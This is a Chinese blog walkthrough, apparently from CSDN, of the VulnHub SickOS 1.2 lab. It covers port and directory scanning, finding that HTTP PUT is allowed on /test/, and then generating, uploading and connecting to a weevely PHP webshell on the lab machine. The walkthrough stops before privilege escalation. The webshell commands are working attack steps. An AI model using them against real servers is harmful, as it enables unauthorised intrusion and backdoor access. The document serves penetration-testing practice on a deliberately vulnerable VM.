PUT漏洞实战


环境准备

本次环境使用的是vulnhub靶场里面的sickos:1.2

靶场下载地址:https://www.vulnhub.com/entry/sickos-12,144/
靶机 192.168.146.154
攻击机 parrot 192.168.146.129


提示:以下是本篇文章正文内容,下面案例可供参考

一、服务器信息搜集

nmap -p- -A 192.168.146.154

发现开放了22和80端口
在这里插入图片描述

二、网站信息搜集

1、浏览网站

浏览器打开站点,大概是这样的↓
在这里插入图片描述

2、使用nikto和dirb对网站扫描

dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具

dirb http://192.168.146.154

发现敏感目录👇
在这里插入图片描述

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h http://192.168.146.154

并没有发现什么有用的信息
在这里插入图片描述

3、OWASP ZAP进行扫描测试

ZAP是OWASP里的工具类项目,全称是OWASP Zed attack proxy,是一款web application 集成渗透测试和漏洞工具,
ZAP主要覆盖了安全性测试里渗透测试即对系统进行模拟攻击和分析来确定其安全性漏洞。

parrot选择owasp-zap进入
在这里插入图片描述
在这里插入图片描述
开始主动扫描👇
在这里插入图片描述
发现了存在X-Frame-Options Header Not Set漏洞
在这里插入图片描述
这里简单介绍一下这个漏洞

X-Frame-Options HTTP响应头是⽤来确认是否浏览器可以在frame或iframe标签中渲染⼀个页⾯,⽹站可以⽤这个头来保证他们的内容不会被嵌入到其他网站中,以来避免点击劫持。

如果配置不当的话,恶意攻击者可以利⽤漏洞攻击做到:

以使⽤⼀个透明的、不可见的iframe,覆盖在⽬标⽹页上,然后诱使⽤户在该⽹页上进⾏操作,通过调整iframe页⾯的位置,可以诱使⽤户恰好点击iframe页⾯的⼀些功能性按钮上,导致被劫持。

【不过本靶机实验用不到,了解一下😄O(∩_∩)O】

curl -v -X OPTIONS 192.168.146.154/test/

在这里插入图片描述
关键:允许使用PUT


三、漏洞利用

1、使用weevely创建木马

weevely是parrot和kali下集成的一款很好用的针对php语言的webshell管理工具,可用于像一个隐藏的后门。
并且携带了大量渗透测试的管理模块,客户端也可以在本地运行shell命令传输

weevely generate 123456 /root/shell.php

在这里插入图片描述
在这里插入图片描述
然后打开火狐,使用扩展RESTClient,将webshell放进去

在这里插入图片描述
send发送
在这里插入图片描述
成功发送到服务器里↓
在这里插入图片描述

2、weevely连接木马

weevely http://192.168.146.154/test/shell.php 123456

在这里插入图片描述
在这里插入图片描述
成功连接✌,接下来就是提权

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值